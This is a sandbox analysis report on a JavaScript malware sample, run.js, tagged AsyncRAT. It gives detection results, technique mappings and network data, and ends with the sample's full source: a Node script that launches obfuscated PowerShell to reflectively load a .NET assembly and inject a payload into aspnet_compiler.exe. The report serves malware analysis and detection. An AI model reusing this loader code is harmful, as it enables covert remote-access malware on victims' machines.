Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
run.js

Overview

General Information

Sample name:run.js
Analysis ID:1446991
MD5:a366f21866b8ff4a50b7261e59ffe128
SHA1:5cd355dc2a1136e311290a24d1f7397a47aac925
SHA256:403fcc5959fdeef737585438c2389a6dec249902dc812a9b523b4339e1a9b282
Tags:AsyncRATjsRAT
Infos:

Detection

Score:52
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Sigma detected: WScript or CScript Dropper
Found WSH timer for Javascript or VBS script (likely evasive script)
Java / VBScript file with very long strings (likely obfuscated code)
JavaScript source code contains large arrays or strings with random content potentially encoding malicious code
Program does not show much activity (idle)
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript

Classification

  • System is w10x64
  • wscript.exe (PID: 2788 cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\run.js" MD5: A47CBE969EA935BDD3AB568BB126BC80)
  • cleanup
No configs have been found
No yara matches

System Summary

barindex
Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\run.js", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\run.js", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1028, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\run.js", ProcessId: 2788, ProcessName: wscript.exe
Source: Process startedAuthor: Michael Haag: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\run.js", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\run.js", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1028, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\run.js", ProcessId: 2788, ProcessName: wscript.exe
No Snort rule has matched

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Source: run.jsReversingLabs: Detection: 18%
Source: run.jsVirustotal: Detection: 26%Perma Link
Source: run.jsInitial sample: Strings found which are bigger than 50
Source: classification engineClassification label: mal52.winJS@1/0@0/0
Source: C:\Windows\System32\wscript.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: run.jsReversingLabs: Detection: 18%
Source: run.jsVirustotal: Detection: 26%
Source: C:\Windows\System32\wscript.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: jscript.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: textshaping.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: textinputframework.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: coreuicomponents.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: coremessaging.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: ntmarta.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{f414c260-6ac0-11cf-b6d1-00aa00bbbb58}\InprocServer32Jump to behavior
Source: run.jsString : entropy: 5.39, length: 183, content: "[<#12554656#>Reflection.Assembly<#12554656#>]::$klaat([Byte[]]$runpeD).$ype($new).$hekm($Execute).$Go to definition
Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
Source: all processesThread injection, dropped files, key value created, disk infection and DNS query: no activity detected
Source: all processesThread injection, dropped files, key value created, disk infection and DNS query: no activity detected
Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity Information3
Scripting
Valid AccountsWindows Management Instrumentation3
Scripting
1
DLL Side-Loading
1
DLL Side-Loading
OS Credential Dumping2
System Information Discovery
Remote ServicesData from Local System1
Data Encoding
Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault AccountsScheduled Task/Job1
DLL Side-Loading
Boot or Logon Initialization Scripts1
Obfuscated Files or Information
LSASS MemoryApplication Window DiscoveryRemote Desktop ProtocolData from Removable MediaJunk DataExfiltration Over BluetoothNetwork Denial of Service
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand
SourceDetectionScannerLabelLink
run.js18%ReversingLabsWin32.Trojan.Generic
run.js27%VirustotalBrowse
No Antivirus matches
No Antivirus matches
SourceDetectionScannerLabelLink
bg.microsoft.map.fastly.net0%VirustotalBrowse
fp2e7a.wpc.phicdn.net0%VirustotalBrowse
No Antivirus matches
NameIPActiveMaliciousAntivirus DetectionReputation
bg.microsoft.map.fastly.net
199.232.210.172
truefalseunknown
fp2e7a.wpc.phicdn.net
192.229.221.95
truefalseunknown
No contacted IP infos
Joe Sandbox version:40.0.0 Tourmaline
Analysis ID:1446991
Start date and time:2024-05-24 07:40:09 +02:00
Joe Sandbox product:CloudBasic
Overall analysis duration:0h 1m 59s
Hypervisor based Inspection enabled:false
Report type:full
Cookbook file name:default.jbs
Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:2
Number of new started drivers analysed:0
Number of existing processes analysed:0
Number of existing drivers analysed:0
Number of injected processes analysed:0
Technologies:
  • HCA enabled
  • EGA enabled
  • GSI enabled (Javascript)
  • AMSI enabled
Analysis Mode:default
Analysis stop reason:Timeout
Sample name:run.js
Detection:MAL
Classification:mal52.winJS@1/0@0/0
EGA Information:Failed
HCA Information:
  • Successful, ratio: 100%
  • Number of executed functions: 0
  • Number of non-executed functions: 0
Cookbook Comments:
  • Found application associated with file extension: .js
  • Stop behavior analysis, all processes terminated
  • Exclude process from analysis (whitelisted): dllhost.exe
  • Excluded IPs from analysis (whitelisted): 13.85.23.86
  • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com.delivery.microsoft.com, ocsp.edge.digicert.com, sls.update.microsoft.com, ctldl.windowsupdate.com, wu-b-net.trafficmanager.net, glb.sls.prod.dcat.dsp.trafficmanager.net
No simulations
No context
MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
bg.microsoft.map.fastly.nethttp://qyt8pi.krestologs.comGet hashmaliciousUnknownBrowse
  • 199.232.210.172
http://birchflarechurch.comGet hashmaliciousUnknownBrowse
  • 199.232.210.172
https://url.au.m.mimecastprotect.com/s/uuv2CgZowrsOpyOOc26VTV?domain=in.xero.comGet hashmaliciousUnknownBrowse
  • 199.232.214.172
https://shop.ketochow.xyz/Get hashmaliciousUnknownBrowse
  • 199.232.214.172
http://cctv.hotmail.cloudns.org/Get hashmaliciousUnknownBrowse
  • 199.232.210.172
http://toenpocket.pro/Get hashmaliciousHTMLPhisherBrowse
  • 199.232.210.172
http://ssl4837289ssl24663521542877.searchmarketingservices.dev/Get hashmaliciousUnknownBrowse
  • 199.232.210.172
http://advanceweb-netzero-2023.square.site/Get hashmaliciousUnknownBrowse
  • 199.232.214.172
http://095485843.weebly.com/Get hashmaliciousHTMLPhisherBrowse
  • 199.232.214.172
http://claimzx-dnnax-kgetx-gl.payfr.my.id/Get hashmaliciousUnknownBrowse
  • 199.232.210.172
fp2e7a.wpc.phicdn.nethttp://qyt8pi.krestologs.comGet hashmaliciousUnknownBrowse
  • 192.229.221.95
SecuriteInfo.com.PUA.Tool.RemoteControl.18.25736.20264.exeGet hashmaliciousRMSRemoteAdminBrowse
  • 192.229.221.95
SecuriteInfo.com.PUA.Tool.RemoteControl.18.25736.20264.exeGet hashmaliciousRMSRemoteAdminBrowse
  • 192.229.221.95
http://birchflarechurch.comGet hashmaliciousUnknownBrowse
  • 192.229.221.95
nF54KOU30R.exeGet hashmaliciousRHADAMANTHYSBrowse
  • 192.229.221.95
https://url.au.m.mimecastprotect.com/s/uuv2CgZowrsOpyOOc26VTV?domain=in.xero.comGet hashmaliciousUnknownBrowse
  • 192.229.221.95
https://shop.ketochow.xyz/Get hashmaliciousUnknownBrowse
  • 192.229.221.95
https://in.xero.com/7hv8mDuF13K6MICiXjOmyJk92EdbNVBSqtgAvYsVGet hashmaliciousUnknownBrowse
  • 192.229.221.95
http://cctv.hotmail.cloudns.org/Get hashmaliciousUnknownBrowse
  • 192.229.221.95
http://toenpocket.pro/Get hashmaliciousHTMLPhisherBrowse
  • 192.229.221.95
No context
No context
No context
No created / dropped files found
File type:ASCII text, with CRLF line terminators
Entropy (8bit):5.453036458906758
TrID:
  • Java Script (8504/1) 100.00%
File name:run.js
File size:1'711 bytes
MD5:a366f21866b8ff4a50b7261e59ffe128
SHA1:5cd355dc2a1136e311290a24d1f7397a47aac925
SHA256:403fcc5959fdeef737585438c2389a6dec249902dc812a9b523b4339e1a9b282
SHA512:50f3cfe58bf8142cae97cbe9f1d1140cf583107744bbc62a2d3f0958519e566532e2eb027cd99de45a498d84725239082ca16c2134e0b4f5c2ebf43ae4c7b700
SSDEEP:24:93iVGziKKjZcOMoF6jmLCHjsgxQXtqmU9lNjicCiZGwuPjSiDrxiLGiYdjwZXBih:93iJC9Y2Z6bvsPE8ZskPEqgpd
TLSH:1131EF38600FC9742F92F3A5D734EA8DD8B30116A4C45F50719D46C85785BA903779EF
File Content Preview:var exec = require("child_process").exec;..var src = "Function FH([String] $far) {" +.. "$JS = [System.Collections.Generic.List[Byte]]::new();" +.. "for ($i = 0; $i -lt $far.Length; $i +=8) {" +.. "$JS.Add([Convert]::ToByte($far.Substring($i,
Icon Hash:68d69b8bb6aa9a86
TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
May 24, 2024 07:41:15.691510916 CEST1.1.1.1192.168.2.50x7aa3No error (0)bg.microsoft.map.fastly.net199.232.210.172A (IP address)IN (0x0001)false
May 24, 2024 07:41:15.691510916 CEST1.1.1.1192.168.2.50x7aa3No error (0)bg.microsoft.map.fastly.net199.232.214.172A (IP address)IN (0x0001)false
May 24, 2024 07:41:16.199314117 CEST1.1.1.1192.168.2.50x9f0aNo error (0)fp2e7a.wpc.2be4.phicdn.netfp2e7a.wpc.phicdn.netCNAME (Canonical name)IN (0x0001)false
May 24, 2024 07:41:16.199314117 CEST1.1.1.1192.168.2.50x9f0aNo error (0)fp2e7a.wpc.phicdn.net192.229.221.95A (IP address)IN (0x0001)false

Click to jump to process

Click to jump to process

Click to dive into process behavior distribution

Target ID:0
Start time:01:40:56
Start date:24/05/2024
Path:C:\Windows\System32\wscript.exe
Wow64 process (32bit):false
Commandline:C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\run.js"
Imagebase:0x7ff668d40000
File size:170'496 bytes
MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
Has elevated privileges:false
Has administrator privileges:false
Programmed in:C, C++ or other language
Reputation:high
Has exited:true

Call Graph

  • Executed
  • Not Executed
callgraph clusterC0 clusterC2C0 clusterC4C0 clusterC6C0 E1C0 entry:C0 F3C2 require E1C0->F3C2 F5C4 exec E1C0->F5C4 F7C6

Script:

Code
0
var exec = require ( "child_process" ).exec;
    1
    var src = "Function FH([String] $far) {" + "$JS = [System.Collections.Generic.List[Byte]]::new();" + "for ($i = 0; $i -lt $far.Length; $i +=8) {" + "$JS.Add([Convert]::ToByte($far.Substring($i, 8), 2));" + "}" + "return [System.Text.Encoding]::ASCII.GetString($JS.ToArray());" + "};" + "function majs { param([string] $str)" + "$danz = $str.Replace('%','0x').Split(' '); $wqi = New-Object 'byte[]' ($danz.Count / 2);" + "$count = 0; for ($i = 0; $i -lt $danz.Count - 1; $i += 2)" + "{ $wqi[$count] = [byte]($danz[$i]); $count++;" + "}" + "return $wqi };" + "$msg = (Get-Content -Path 'C:\\Users\\Public\\msg.txt');" + "$runpe = (Get-Content -Path 'C:\\Users\\Public\\runpe.txt');" + "$wqi = majs $msg;" + "$runpeD = majs $runpe;" + "$new = (Get-Content -Path 'C:\\Users\\Public\\NewPE2.txt');" + "$Execute = (Get-Content -Path 'C:\\Users\\Public\\Execute.txt');" + "$Invoke = (Get-Content -Path 'C:\\Users\\Public\\Invoke.txt');" + "$HJI = 'C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\aspnet_compiler.exe';" + "$klaat = (Get-Content -Path 'C:\\Users\\Public\\load.txt');" + "$ype = (Get-Content -Path 'C:\\Users\\Public\\Gettype.txt');" + "$hekm = (Get-Content -Path 'C:\\Users\\Public\\getMethod.txt');";
      2
      var command = "[<#12554656#>Reflection.Assembly<#12554656#>]::$klaat([Byte[]]$runpeD).$ype($new).$hekm($Execute).$Invoke($null,[Object[]]($HJI,$null,[Byte[]]$wqi,$true)); Stop-Process -Name 'node'";
        3
        src += command;
          4
          exec ( "powershell.exe -Command \"" + src + "\"",
            5
            function (err, stdout, stderr) {
              6
              if ( err )
                7
                {
                  8
                  return ;
                    9
                    }
                      10
                      } ) ;
                        Reset < >